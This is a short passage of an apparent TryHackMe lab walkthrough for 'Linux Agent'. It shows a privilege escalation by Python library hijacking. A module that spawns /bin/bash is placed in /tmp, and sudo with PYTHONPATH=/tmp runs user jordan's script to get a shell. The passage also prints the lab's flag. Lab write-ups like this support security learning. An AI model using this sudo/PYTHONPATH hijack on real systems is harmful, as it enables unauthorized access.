th3pirat3Blood/tryhackme-walkthrough/Linux Agent/Readme.md

 os.system("/bin/bash")
 ```

+Calling the */opt/scripts/Gun-Shop.py* command with path set to */tmp* dir

 ```bash
 sudo -u jordan PYTHONPATH=/tmp /opt/scripts/Gun-Shop.py
 ```
+And we get a shell.
+Now just going to home dir for user *jordan* and `cat` out the *flag.txt*.
 The flag is reversed.
 Use `rev` to reverse it

 `jordan{fcbc4b3c31c9b58289b3946978f9e3c3}`